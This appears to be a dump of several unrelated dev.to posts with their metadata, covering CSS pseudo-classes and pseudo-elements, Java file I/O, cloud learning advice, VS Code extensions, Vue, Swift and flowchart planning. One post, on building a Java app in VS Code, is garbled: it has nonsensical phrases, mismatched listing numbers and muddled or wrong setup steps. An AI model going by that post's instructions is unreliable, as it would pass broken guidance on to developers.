This article was written for [the Moesif blog](https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails) by Larry Ebringer, Head of Marketing @Moesif. | kayis |
737,749 | Pseudo-classes and pseudo-elements | CSS provide useful selector types that focus on specific platform state, like when the element is... | 13,217 | 2021-06-24T12:27:32 | https://dev.to/garimasharma/pseudo-classes-and-pseudo-elements-npp | css, codenewbie, beginners, html | CSS provide useful selector types that focus on specific platform state, like when the element is hovered, active etc.
## Pseudo-Classes
HTML here find themselves in various stages either because they are interacted with user or one of their child element is in a certain state.
For example, an HTML element could be hovered with the mouse pointer by a user or a child element could also be hovered by the user. For those situations, use the `:hover` pseudo-class.
```css
/*When the link is hovered with a mouse pointer this code is fired*/
a:hover {
color: blue;
text-decoration: underline;
}
```
> *Pseudo-classes let you apply CSS based on state changes. This means that your design can react to user input and changes accordingly.*
For example
you have an email signup form, you can change the border color of the field to red, if it contains invalid email address and green when it contains correct email address.
As stated above pseudo-class let us apply CSS based on user input. Entering an email address is the input of the user. (whether right or wrong)
**How do you do that?**
Well, we have a pseudo-class `:invalid`, this is one of many browser-provided **pseudo-class**
{% codepen https://codepen.io/garima-sharma814/pen/MWpNWqJ %}
A pseudo-class lets you apply styles based on state changes and external factors. This means that your design can react to user input such as an invalid email address.
### Interactive States
We can apply the following pseudo-classes on the interaction of a user with our page.
- **:hover**
If the user is pointing to an element with a pointing device (can be a mouse), an they place it over an element, we can trigger the action of the user with `:hover` class to apply different style when user *hovers* on it.
{% codepen https://codepen.io/garima-sharma814/pen/mdWNdZZ %}
**We can achieve this effect with little effort**
```html
<p> This is link <a href="#"> Try hovering me! </a> </p>
```
```css
/*This line is to remove the default behavior of anchor tag we want underline effect one hover */
a{
text-decoration: none;
}
/*When the user hover on a tag this code will be fired*/
a:hover{
text-decoration: underline;
color: #8e44ad;
}
```
- **:active**
This state is triggered when an element is actively being interacted with— such as a click—before click is released. If a pointing device like a mouse is used, this state is when the click starts and hasn't yet been released.
{% codepen https://codepen.io/garima-sharma814/pen/QWpewNd %}
**We can achieve this effect with little effort**
```html
<div>
<button class="btn">Click and hold to see the active state</button>
</div>
```
```css
.btn:active {
transform: scale(0.99);
box-shadow: none;
}
```
There are tons of pseudo-classes for us to explore on. If you want to know more go to [Pseudo-classes](https://developer.mozilla.org/en-US/docs/Web/CSS/Pseudo-classes)
## Pseudo-Elements
Pseudo-elements differ from pseudo-classes because instead of responding to the platform state, they act as if they are inserting a new element with CSS. Pseudo-elements are also syntactically different from pseudo-classes, because instead of using a single colon (:), we use a double colon (::).
>A pseudo-element is like adding or targeting an extra element without having to add more HTML.
For example
If you've got an article of content and you want the first letter to be a much bigger drop cap— how do you achieve that?
In CSS, you can use the `::first-letter` pseudo-element to achieve this sort of design detail.
```css
p::first-letter {
color: blue;
float: left;
font-size: 2.6em;
font-weight: bold;
line-height: 1;
}
```
{% codepen https://codepen.io/garima-sharma814/pen/yLMmyjK %}
**::before and ::after**
Both the `::before` and `::after` pseudo-elements create a child element inside an element only if you define a content property.
```css
.my-element::before {
content: "";
}
```
```css
.my-element::after{
content: "";
}
```
`::before` pseudo-element to insert content at the start of an element, or the `::after` pseudo-element to insert content at the end of an element.
Pseudo-elements aren't limited to inserting content, though. We can also use them to target specific parts of an element.
The content can be any string even an empty one but be mindful that anything other than an empty string will likely be announced by a screen reader. We can add an image `url`, which will insert an image at its original dimensions, so we won't be able to resize it.
There are tons of pseudo-classes for us to explore on. If you want to know more go to [Pseudo-Elements](https://developer.mozilla.org/en-US/docs/Web/CSS/Pseudo-elements)
Written and Edited by [me](https://twitter.com/garimavatss)❤.
<a href="https://www.buymeacoffee.com/garimasharma"><img src="https://img.buymeacoffee.com/button-api/?text=Buy me a coffee&emoji=&slug=garimasharma&button_colour=FF5F5F&font_colour=ffffff&font_family=Arial&outline_colour=000000&coffee_colour=FFDD00" /></a> | garimasharma |
737,828 | Build a Java Application in Visual Studio Code | For years, Java development has been dominated by three leading IDEs: Eclipse, IntelliJ IDEA and... | 0 | 2021-06-24T13:26:18 | https://dev.to/priyanshi_sharma/build-a-java-application-in-visual-studio-code-545p | java, programming, webdev, productivity | For years, [Java](https://www.java.com/) development has been dominated by three leading IDEs: Eclipse, IntelliJ IDEA and NetBeans. But we have other suitable opportunities. Among many talented multilingual code editors, Visual Studio Code has proven to be an outstanding product with exceptional Java support. VS Code also provides world-class support for other technology stacks, including front-end JavaScript frameworks, Node.js, and Python.
## [Building a Java Application in Visual Studio Code in 2021](https://www.decipherzone.com/blog-detail/building-java-application-visual-studio-code) ##
Should Visual Studio Code be your following Java IDE? This article describes using Visual Studio Code to create an enterprise [Java](https://www.decipherzone.com/blog-detail/code-analysis-tools-java) back end with Spring and connect to the Svelte JavaScript front end.
### Set up Spring Boot ###
To build with this tutorial, you must have [Java](https://www.decipherzone.com/blog-detail/code-analysis-tools-java) and Maven installed. You will also need the latest version of the Visual Studio code for your system if you do not already have one. After that, it's easy to install.
Let's go straight to the new project. You plan to use Spring Initializer to create a Spring startup website program. First, open VS Code and click the extension icon in the top left corner. This is a great way to search for available plugins (and there are many). Type spring starts, and you will see the support extension for Java Spring Initializr. Install it as shown in Figure 1.

Once installed (it doesn't take long), you can use it from the command palette, which can be accessed by Ctrl-Shift-P (or View -> Main Menu Command Palette). When the command palette is open, enter "spring start", and you will see the newly installed command. Run it.
Let us now come to the master. You can accept most of the default settings, for example, [Java](https://www.decipherzone.com/blog-detail/what-is-adapter-design-pattern); Java version 12; Artifact identifier "demo"; Group ID "com.InfoWorld"; Packaging "VASO"; and the rest. When adding dependencies, add Spring Boot Web and Spring DevTools. (You can add more dependencies later by right-clicking the POM file and selecting Add Starter.) You will also choose the project's location; select the appropriate location on your local drive.
Once the new project has been created and loaded into your workspace, you can open a command-line terminal by typing Ctrl-Shift or choosing Terminal -> New Terminal from the main menu.
Enter Spring Boot: run mvn on the terminal. The first time you do this, Maven will download your new dependencies. As soon as this is done, the development server is operational. To confirm this, open your browser and go to localhost: 8080. You will see a default "not found" page as we have not yet defined the routes, but it does confirm that the server is running.
You can quickly access the files by pressing Ctrl-Shift-P and typing "Demo" to see the DemoApplication.java file. Open it, and you will see a typical standalone spring launcher.
We are now installing a [Java](https://www.decipherzone.com/blog-detail/template-method-design-pattern) plugin that offers us many functions such as IntelliSense and context-based resource generation. Back in the extension menu, type in "Java Extension" and install the Java Extension Package. Finally, add the Spring Boot Extension Pack.
Now when you open the DemoApplication.java file, you will find that the VS code has a good run and debug commands directly in the source file.
### Import the Java project ###
Here Visual Studio Code understands Java and asks, "This project contains Java. Do you want to import it?" Go ahead and choose Always. Once that's done, the VS code can be automatically updated for [Java](https://www.decipherzone.com/blog-detail/proxy-design-pattern-in-java) etc.
We add a REST controller. Open the file browser (top left corner), right-click / src / com / InfoWorld / demo and select New File. Name the file MyController.java. You will find that the VS code has ordered your class for you, as shown in list 1.
<strong> Listing 1. Java stub in VS Code </strong>
package com.InfoWorld.demo;
public class MyController {
}
Start by marking the class as @RestController. Please note that with the installed extensions, you get the full support of AutoFill.
Also, note that you can still query IntelliSense and Autofill by placing the cursor at the desired location and pressing Ctrl-Space, which will show you which VS code recommendations are based on your current location. This seems familiar when using Eclipse; This is the same keyboard shortcut.
Enter the text "Get ..." in the new MyController class, and you will get the code snippet for Autofill GetMapping; forward and select. This will create a basic GET mapping that we'll be modifying, as shown in List 2.
### Create a Svelte frontal ###
Now we open a new terminal - you can manage the side of the terminal by the side by choosing Terminal -> Split Terminal. Then, in the new airport, go to the appropriate directory (not part of the Java project) and use the commands in list 3 to create a new Svelte interface.
<strong> Listing 2. Slender front scaffolding </strong>
npx degit sveltejs/template vs-java-frontend
cd vs-java-frontend
npm install
npm run dev
Now YOU can go to localhost: 5000 and view the Svelte homepage.
### Add the front-end to the workspace ###
Then right-click the File Explorer under the demo project and select Add Folder to Workspace. Access to your newly created client project through Svelte. It adds an interface VS code as part of the project workshop so we can change it.
Now add the VS-Code extension to Svelte VS-Code in the same way as the Java extensions above. Once the extension is installed, VS Code can process both the previous final Java structure and a Java backup.
### Connect the front and back ends ###
We can test the internal communication with the critical combination Ctrl-Shift-P to open the file app. svelte and change it like list 4 to change the script element.
<strong> Listing 3. Hitting the back-end </strong>
<script>
export let name;
async function loadData(){
let response = await fetch("http://localhost:8080");
name = await response.text();
}
loadData();
</script>
List 4 performs a function that triggers a simple GET question for our endpoint and stores the answer in a named variable reflected in the tag.
## Java runtime configuration ##
To obtain and configure the [Java](https://www.decipherzone.com/blog-detail/when-use-composite-design-pattern-java) Runtime Environment information, you can open the Command Palette (Ctrl-Shift-P) and open Configure the Java Runtime Environment. You will see a screen like a Figure 2.
<strong> Figure 2. Java runtime configuration </strong>

Please note that VS Code identifies the JDK you have installed and determines which projects and which version to use. It also allows you to install a newer version of the IDE.
### Debugging Java ###
Debugging [Java](https://www.decipherzone.com/blog-detail/iterator-design-pattern) in VS code is also easy. Stop the demo program while it is running. Right-click the DemoApplication file and select Debug. Spring Boot is running in debug mode.
To set a breakpoint, open MyController and double-click on the red point to the left of the 14 lines. Now localhost: reload 5000 pages. Finally, the breakpoint is occupied, and you will see the screen shown in Figure 3.

Note that in the menu bar, you will continue, enter, skip, etc.
### Running tests ###
Now open the DemoApplicationTests.java file created by Spring Initializer. Note that the running tests are open. Click here. (You can also right-click the file and select Start [Java](https://www.decipherzone.com/blog-detail/mediator-design-pattern).) The tests are running, and a checkmark is displayed to see the test results, as shown in Figure 4.

## Saving the workspace configuration ##
When you close VS Code, you will be prompted to save the workspace configuration named workspace. Code-workspace. Save your settings and open the project again to find all of your settings.
### VS Code for Java ###
The [Java](https://www.decipherzone.com/blog-detail/facade-design-pattern) feature in the Visual Studio code is comparable to a standard Java IDE with exact extensions installed. The difference: VS code is lighter, more responsive and requires minimal effort.
This speed and simplicity, along with the ability to seamlessly use other collections of technology - you see the meaning that you don't have to change gears or fight setup time in the new environment - makes VS code a compelling opportunity for [Java development](https://www.decipherzone.com/hire-developer). Like the popularity of WooCommerce request a quote plugin boosts the development process of WooCommerce plugins to support Woo store endlessly.
Source: [Decipher](https://www.decipherzone.com/blog) | priyanshi_sharma |
737,998 | Como ler e escrever arquivos de texto com Java | Neste artigo eu apresento alguns casos de usos simples de leitura e escrita de arquivos de texto com... | 0 | 2021-06-24T16:50:08 | https://wldomiciano.com/como-ler-e-escrever-arquivos-de-texto-em-java/ | java, braziliandevs | Neste artigo eu apresento alguns casos de usos simples de leitura e escrita de arquivos de texto com Java.
## Leitura
O código abaixo mostra como retornar todo o conteúdo de um arquivo de texto como uma `String`.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class ReadingAllContent {
public static void main(String... args) {
try {
Path path = Paths.get("text.txt");
byte[] bytes = Files.readAllBytes(path);
String content = new String(bytes, UTF_16);
System.out.println(content);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
Com Java 11 ou mais recente o código fica mais simples usando o método [`Files#readString`][readstring]:
```java
Path path = Path.of("text.txt");
String content = Files.readString(path, UTF_16);
```
Também é possível retornar todas as linhas do arquivo como uma lista de `String` usando o método [`Files#readAllLines`][readalllines].
```java
Path path = Paths.get("text.txt");
List<String> lines = Files.readAllLines(path, UTF_16);
lines.forEach(System.out::println);
```
Os métodos acima carregam todo o conteúdo do arquivo na memória de uma só vez, por isso só devem ser usados quando o arquivo não for tão grande.
Para ler arquivos maiores, linha a linha, podemos usar o método [`Files#lines`][lines] que retorna uma `Stream` que lê as linhas conforme é consumida.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.stream.Stream;
public class ReadingAsStream {
public static void main(String... args) {
Path path = Paths.get("text.txt");
try (Stream<String> stream = Files.lines(path, UTF_16)) {
stream.forEach(System.out::println);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
A `Stream` retornada precisa ser fechada quando não for mais útil, por isso, no exemplo eu utilizei o [_try-with-resource_][try] que garante seu fechamento.
## Escrita
O código abaixo mostra como escrever uma `String` em um arquivo.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class WritingString {
public static void main(String... args) {
try {
Path path = Paths.get("text.txt");
String content = "abc";
byte[] bytes = content.getBytes(UTF_16);
Files.write(path, bytes);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
Com Java 11 ou mais recente o código fica mais simples usando o método [`Files#writeString`][writestring].
```java
Path path = Path.of("text.txt");
Files.writeString(path, "abc", UTF_16);
```
O método [`Files#write`][write-list] também aceita uma lista de `String` como argumento.
```java
Path path = Paths.get("text.txt");
List<String> lines = Arrays.asList("a", "b", "c");
Files.write(path, lines, UTF_16);
```
Neste caso, cada `String` da lista será escrita como uma nova linha no arquivo.
## Observação 1: Escolhendo o charset
Nos exemplos acima eu passei o `Charset` [UTF-16][utf16] explicitamente apenas para mostrar que é possível, pois nem sempre é necessário.
O método [`Files#readString`][readstring], por exemplo, poderia ser invocado assim:
```java
Path path = Paths.get("text.txt");
String content = Files.readString(path);
```
Neste caso o charset usado por padrão será o UTF-8 e o mesmo vale para os métodos mostrados abaixo:
```java
Path path = Paths.get("text.txt");
String a = Files.readString(path);
List<String> b = Files.readAllLines(path);
Stream<String> c = Files.lines(path);
Files.writeString(path, "abc");
Files.write(path, Arrays.asList("a", "b", "c"));
```
Já no método [`String#getBytes`][getbytes], se o charset não for passado explicitamente, será usado o charset padrão da sua plataforma. Para obter o charset padrão, você pode usar o método abaixo:
```java
Charset charset = Charset.defaultCharset();
```
Por fim, a classe [`StandardCharsets`][standardcharsets] possui constantes apenas para os charsets que são requeridos por qualquer implementação da plataforma Java. Se você precisar de um charset não definido nesta classe, é possível obter da seguinte forma:
```java
Charset charset = Charset.forName("UTF-32");
```
Se o charset desejado for suportado pela JVM, uma instância de `Charset` será retornada, caso contrário uma exceção será lançada.
## Observação 2: Outras opções
Os métodos de escrita `Files#writeString` e `Files#write` também aceitam opções extras.
Por padrão eles criarão um novo arquivo caso não exista ou sobrescreverão o conteúdo de um arquivo existente, mas é possível mudar este comportamento.
Considere o código abaixo:
```java
import static java.nio.file.StandardOpenOption.APPEND;
import static java.nio.file.StandardOpenOption.CREATE;
import static java.nio.file.StandardOpenOption.CREATE_NEW;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class WritingWithOptions {
public static void main(String... args) throws IOException {
byte[] content = "abc".getBytes();
/* 1 */ Files.write(Paths.get("a.txt"), content, APPEND);
/* 2 */ Files.write(Paths.get("b.txt"), content, CREATE, APPEND);
/* 3 */ Files.write(Paths.get("c.txt"), content, CREATE_NEW);
}
}
```
O **exemplo 1** acrescentará `content` à um arquivo existente e lançará uma exceção caso o arquivo não exista.
O **exemplo 2** é parecido com o primeiro, mas criará um novo arquivo caso não exista ao invés de lançar uma exceção.
Já no **exemplo 3** ele sempre tentará criar um novo arquivo e lançará uma exceção se o arquivo já existir.
Há outras opções disponíveis na classe [`StandardOpenOption`][standardopenoption], consulte a documentação para saber mais.
## Conclusão
Há outras formas de ler e escrever arquivos em Java e compreender os métodos acima é um bom ponto de partida antes de partir para casos mais complexos.
Se encontrar algum erro ou tiver alguma informação adicional, não deixe de usar os comentários.
[try]: https://docs.oracle.com/javase/tutorial/essential/exceptions/tryResourceClose.html
[lines]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#lines(java.nio.file.Path,java.nio.charset.Charset)
[utf16]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/charset/StandardCharsets.html#UTF_16
[standardopenoption]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/StandardOpenOption.html
[write-bytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#write(java.nio.file.Path,byte[],java.nio.file.OpenOption...)
[write-list]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#write(java.nio.file.Path,java.lang.Iterable,java.nio.charset.Charset,java.nio.file.OpenOption...)
[writestring]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#writeString(java.nio.file.Path,java.lang.CharSequence,java.nio.charset.Charset,java.nio.file.OpenOption...)
[readstring]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readString(java.nio.file.Path,java.nio.charset.Charset)
[readalllines]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readAllLines(java.nio.file.Path)
[readallbytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readAllBytes(java.nio.file.Path)
[getbytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/lang/String.html#getBytes()
[standardcharsets]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/charset/StandardCharsets.html
| wldomiciano |
738,567 | Start Learning Cloud Skills! | A screenshot of one of my personal cloud projects. Introduction In my previous... | 0 | 2021-06-26T10:07:07 | http://www.karimarttila.fi/cloud/2021/06/24/start-learning-cloud-skills.html | cloud, aws, azure | ---
title: Start Learning Cloud Skills!
published: true
date: 2021-06-24 00:00:00 UTC
tags: cloud,cloud,aws,azure
canonical_url: http://www.karimarttila.fi/cloud/2021/06/24/start-learning-cloud-skills.html
---

_A screenshot of one of my personal cloud projects._
### Introduction
In my previous corporation an Azure guy once told me: _“It is not possible to be an expert in more than one cloud. If you want to be an expert in Azure you have to focus on Azure.”_ A few days passed and an AWS guy told me: _“If you want to be an expert in AWS you have to focus on AWS.”_
### Is It True?
Is it really true? If you want to be an expert in one cloud, do you really have to ditch other clouds away and focus solely on one cloud? No, it isn’t true. You can happily be an expert in so many clouds you want. I have done IaC in Azure, GCP and AWS projects. There is no law that says you can’t do so. I also have done certifications in all of these clouds (see in [www.karimarttila.fi/about](https://www.karimarttila.fi/about/) the status of my current cloud certs).
### The Argument
I guess those guys just were a bit troubled talking to a guy who does multi cloud work. It is very human to try to come up with an argument to rationalize your choices. Their choice was to stick with one cloud - and one of the arguments for that choice was that _“it is not possible to be an expert in more than one cloud.”_
### On the Other Hand
On the other hand those guys were right, sort of. If you focus only on one cloud and dedicate all your learning resources to study that cloud - naturally you will be a better expert in that cloud compared to studying two or three clouds.
But this argument does not fly that far. I have two academic degrees, M.A. in psychology and M.Sc. in Software Engineering. It is perfectly possible to be interested in various fields and technologies and study them all. To study those academic degrees took me a lot more efforts than studying three clouds. The thing that those dedicated cloud guys didn’t get was that I work as a software architect and programmer. I don’t have to remember by heart every little detail of any specific cloud. It’s entirely sufficient to understand the basic concepts well and the most important services. Every cloud provides VPCs, subnets, firewalls, VMs, container registries, Kubernetes as a service, databases etc. If you have learned one cloud it is easier to learn the same basic concepts and how to use them in new clouds, just like with programming languages. No one says that you cannot learn more than one programming language and therefore you have to stick with Javascript (if you don’t believe me, read my story [Five Languages - Five Stories](https://www.karimarttila.fi/languages/2018/11/19/five-languages-five-stories.html)).
### Why to Study Cloud Technologies?
I’m old enough to remember the era of the managed services divisions in big IT corporations. At the beginning of the project the software architect had to calculate the needed capacity for various servers since when you sent the order to the managed services division and they started to order those physical servers it took weeks to have them at your data center with all middleware and firewalls installed and configured. In my first cloud project some years ago I was just astonished when I realized that I can create a whole virtual infrastructure with VPC, subnets, firewalls, frontend servers, backend servers, databases, queues, alarms etc using infrastructure code, and without any help from some managed services division. And that I could deploy a new copy of that environment in minutes, up and running, everything configured just as defined in the infrastructure code. Ever since that insight I never looked back. I decided that I will work only in cloud projects in which I can create the cloud infrastructure as code and the applications running in that cloud infra.
Public clouds with virtual infrastructures are the new paradigm. If you are an application developer I strongly recommend you to start learning cloud technologies as well.
### Do You Have to Certify?
No, you don’t. You can learn everything you need to know about public clouds without ever going to one certification exam. The reason I like to take these certification tests is that the requirements for the basic cloud certifications provide really good list for the most important concepts and services you need to understand anyway for being a successful cloud expert in the cloud projects (and I’m talking here the “basic” developer/engineer/architect certs and not the specialty certs). And once you have learned those requirements why not to take the certification exam as well, put the cert in your LinkedIn profile and start getting calls from headhunters.
### How to Start Learning Cloud Skills?
Everyone has his or her own learning methods. Mostly just follow your common sense and start learning the basics whatever methods suites you. There are a lot of material on the Internet. I have liked a lot about the courses in Pluralsight and in Coursera and do the Qwiklabs or other labs related to those courses. I have also attended some traditional courses related to some specifics like Security on AWS.
If you know nothing of public clouds, just choose one of the “Big Three” - i.e. AWS, Azure, or GCP. It is not that important which one you choose - they are all good public clouds. Once you master the basics in that cloud it is easier to learn the basics regarding the other two clouds as well.
Your next step is to get **a cloud account** - you cannot learn cloud skills just by reading books - you absolutely need a cloud account. All Big Three clouds provide “free tier services” or a certain amount of free credits if you order a personal account (at least they used to do that when I learned the basics - nowadays I mostly use my company’s cloud accounts for my personal projects as well and let the capitalists pay my learning bills).
I worked in my previous corporation as a Cloud Mentor. One of my duties was to teach cloud skills to our developers. I always emphasized that there are three things you need to learn:
1. **Basic information regarding the cloud and its basic services** (e.g. virtual network, basic storage options, basic computing options).
2. How to use the **cloud provider’s portal** efficiently.
3. How to create **infrastructure as code**.
You can learn the basic concepts and services, and how to use the cloud provider’s portal following various video courses eg. in Pluralsight or Coursera, and do the labs in dedicated sites (like Qwiklabs) or using your personal cloud account (or do like I do: use your company’s cloud account (with permission, of course) and let the capitalist pay your learning bills). But what those courses don’t teach that much is how to create infrastructure as code (IaC) using eg. Terraform or Pulumi or cloud provider’s native IaC tool like CloudFormation, ARM, or Deployment Manager. It is utterly important to learn how to create infrastructure as code since in real projects that is how the cloud solution is done professionally (and not by clicking resources with a mouse in the cloud portal).
So, what are you waiting for? Start learning cloud skills! (And once you think you are an expert, read: [Cloud Infrastructure Golden Rules](https://www.karimarttila.fi/iac/2020/04/10/cloud-infrastructure-golden-rules.html) - my personal manifest how to create cloud infrastructures.)
_The writer is working at Metosin using Clojure in cloud projects. If you are interested to start a Clojure project in Finland or you are interested to get Clojure training in Finland you can contact me by sending email to my Metosin email address or contact me via LinkedIn._
Kari Marttila
- Kari Marttila’s Home Page in LinkedIn: [https://www.linkedin.com/in/karimarttila/](https://www.linkedin.com/in/karimarttila/) | karimarttila |
755,312 | Summer Series to learn Cassandra NoSQL DB | For some time I have been following the DataStax Developer workshops regarding the use of the... | 0 | 2021-07-10T08:09:04 | https://dev.to/amylynn87/summer-series-to-learn-cassandra-nosql-db-1kgo | react, netlify, codenewbie, database | For some time I have been following the DataStax Developer workshops regarding the use of the Cassandra NoSql DataBase.
The "Summer Series" workshops are very interesting: this week we created a "ToDo App" in React communicating with the DB, so that all the commitments are saved and are not lost when the page is refreshed. Next week will be the time to make a Tik Tok clone (I'm really very curious about it!). The next week there will be the construction of a Netflix clone instead (for which I have already attended a workshop but there are still some obscure points, so I will follow it again!).
it's all completely free, they offer badges for completing the exercises after following the workshop and you learn a lot about the world of DB NoSql (and much more!)
Follow them on Youtube and maybe join the next live:
https://www.youtube.com/channel/UCAIQY251avaMv7bBv5PCo-A | amylynn87 |
738,589 | Las 15 mejores extensiones para VSCode. | En esta ocasión te mostraré las 15 extensiones que debes instalar en Visual Studio Code para sacarle... | 0 | 2021-06-24T23:33:15 | https://dev.to/gdcodev/las-15-mejores-extensiones-para-vscode-2021-430n | vscode, productivity, webdev, espanol |
En esta ocasión te mostraré las 15 extensiones que debes instalar en Visual Studio Code para sacarle el máximo provecho y así facilitar tu trabajo día a día como desarrollador.
#### Aquí están las extensiones de VSCode que cubriremos:
+ [PRETTIER](#1)
+ [Auto Close Tag](#2)
+ [Auto Rename Tag](#3)
+ [Material Icon Theme](#4)
+ [Bracket Pair Colorizer](#5)
+ [Better Comments](#6)
+ [LIVE SERVER](#7)
+ [LIVE SHARE](#8)
+ [GITLENS](#9)
+ [SNAPCODE](#10)
+ [Settings Sync](#11)
+ [Code Spell Checker](#12)
+ [Import Cost](#13)
+ [Markdown All in One](#14)
+ [Path Intellisense](#15)
---
1. **PRETTIER** <a name="1"></a>
- Formatea tu código de manera automática.

2. **Auto Close Tag** <a name="2"></a>
- Tiene soporte de etiqueta cerrada para archivos.

3. **Auto Rename Tag** <a name="3"></a>
- Cambia automáticamente el nombre de una etiqueta. Ahorra tiempo al renombrar una etiqueta.

4. **Material Icon Theme** <a name="4"></a>
- Con este tema tendrás un entorno limpio, minimalista y atractivo.

5. **Bracket Pair Colorizer** <a name="5"></a>
- Permite identificar los corchetes correspondientes con colores.

6. **Better Comments** <a name="6"></a>
- Podrás darle color a tus comentarios.

7. **LIVE SERVER** <a name="7"></a>
- Server local en tiempo real de nuestra pagina.

8. **LIVE SHARE** <a name="8"></a>
- Trabaja en tiempo real en el mismo código.

9. **GITLENS** <a name="9 "></a>
- Historial de quien ha editado un fragmento de código en GIT.

10. **SNAPCODE** <a name="10"></a>
- Capturas de pantalla profesional.

11. **Settings Sync** <a name="11"></a>
- Permite sincronizar el estado de su VSCode entre varias instancias.

12. **Code Spell Checker** <a name="12"></a>
- Nos ayuda a detectar errores ortográficos.

13. **Import Cost** <a name="13"></a>
- Ayuda con la productividad al mostrar el tamaño estimado de un paquete de importación.

14. **Markdown All in One** <a name="14"></a>
- Es una extensión muy útil para todo lo relacionado con Markdown.

15. **Path Intellisense** <a name="15"></a>
- Esta extensión le ayuda a completar automáticamente la ruta de las importaciones.

---
Repositorio de Git: https://github.com/gdcodev/extensiones-vscode
📌 Mis Redes: 🔵[Facebook](https://www.facebook.com/gdcode7) | 💼[LinkedIn](https://www.linkedin.com/in/gastondanielsen/) | 💻[Github](https://github.com/gdcodev) | gdcodev |
738,695 | Methods vs Computed in Vue | Hello 👋🏼, Lately I've been learning Vue. So today I learned about computed property. In my... | 0 | 2021-06-25T01:47:08 | https://dev.to/adiatiayu/methods-vs-computed-in-vue-21mj | help, discuss, vue, codenewbie | Hello 👋🏼,
Lately I've been learning Vue.
So today I learned about computed property.
In my understanding (please correct me if I'm wrong), `computed` is the same as `methods` property, only it will be re-executed if data that are used within the property are changed.
While `methods` property will be re-executed for any data changes within the page.
In which condition is the best practice to use `methods` or `computed`?
Thank you in advance for any help 😊 | adiatiayu |
738,701 | #100DaysOfSwift: Day 8 | Hey ! Today, I learned about structures but for short struct. They are given their own variables,... | 0 | 2021-06-25T02:09:00 | https://dev.to/keeyboardkeda/100daysofswift-day-8-3pe | beginners, ios, swift | Hey !
Today, I learned about structures but for short struct. They are given their own variables, constants, and their own functions and are used in any way. Variables inside of struct are called stored properties and computed properties. You can use a struct when you have fixed data that you want to send or receive multiple times.
I learned about all that goes into structs, like the following:
1. Computed properties run code to figure out the structs value.
2. Property observers which lets you run code before or after any property changes.
3. Methods are functions inside of structs and the functions can use the properties of the struct as needed. Methods belong to structs, enums, and classes.
4. Mutating methods - the keyword mutating is used when you want to change properties in a struct. By default, structs are constants.
5. Strings and arrays have their own properties and methods !
Overall, I think today was a good learning day.
Until tomorrow ! | keeyboardkeda |
738,721 | Pentingnya Sebuah Desain Sebelum Memulai Mengetik Program | Sebagai seorang yang masih belajar dalam pemrograman khususnya Website, saya ingin berbagi sedikit... | 0 | 2021-06-25T02:51:24 | https://dev.to/0wx/pentingnya-sebuah-desain-sebelum-memulai-mengetik-program-21gm | design, architecture, indonesia | Sebagai seorang yang masih belajar dalam pemrograman khususnya Website, saya ingin berbagi sedikit pengalaman dimana saya mampu meningkatkan produktifitas dengan hal yang sederhana.
## Kesalahan
Kesalahan fatal dari kebanyakan Programmer yang juga saya alami adalah mulai mengetik tanpa menggambarkan apa yang dia ingin capai, hanya memikirkan rancangan yang kemungkinan besar akan terlupakan detailnya dalam 1-2 jam kedepan akhirnya bergelut dengan berbagai macam ketidak-konsistensi-an dalam programnya.
Hindari mengetik program tanpa menjabarkan rancangan awal, buatlah sebuah _flowchart_ apa yang ingin dicapai dan bagaimana cara mencapainya, meskipun hanya sebuah program sederhana yang bahkan hanya untuk mengisi waktu luang. Kebiasaan untuk menggambarkan sebuah _flowchart_ sangat bagus agar terbiasa mempunyai rancangan yang konsisten kedepannya.
## Flowchart
Untuk membuat sebuah _Flowchart_ pun tidak lah rumit, cukup dengan dasar di bawah ini sudah men-_cover_ ±70% _(berdasarkan pengalaman pribadi)_ dari _Flowchart_ yang akan kalian buat di kemudian hari

## Alat
Ada 2 macam alat yang biasa saya pakai:
#### 1. Buku kecil dan Pensil
Buku kecil dan Pensil yang paling sering saya pakai untuk mengurangi _screen time_ saya, pensil pun wajib yang ada penghapusnya 😂, apalagi saya juga sering touring di hari sabtu dan minggu, sangat cocok saat nongkrong tiba-tiba muncul ide baru langsung saya tulis. Juga berlaku saat ngopi-ngopi bareng teman. Baru setelah udah di depan layar dibikin ulang pakai tools ke dua.
#### 2. Flowchart dari https://app.diagrams.net/
Ini salah satu online tools favorit saya karna tidak harus login (tinggal klik icon silang/close di pojok kanan atas pop up login) lalu mulai menggambar. Beberapa keunggulan yang saya suka:
1. Dark Theme *(WAJIB)*
2. Tidak Perlu login
3. Aplikasi web yang sangat ringan
## Kesimpulan dan saran
Menggambarkan rancangan program yang akan kita buat sangat membantu meningkatkan konsistensi dan mempercepat waktu produksi, luangkan waktu setidaknya 15-30 menit setelah _Flowchart_ anda selesai untuk memikirkan kembali apakah semua sudah sesuai atau belum, dan kerjakan tiap bagian sesuai arah panah.

Misal contoh di atas, berarti kerjakan API terlebih dahulu, dan jika sudah selesai bisa dicoba memberikan warna sesuai selera, seperti contoh di atas (hijau: selesai, merah: belum).
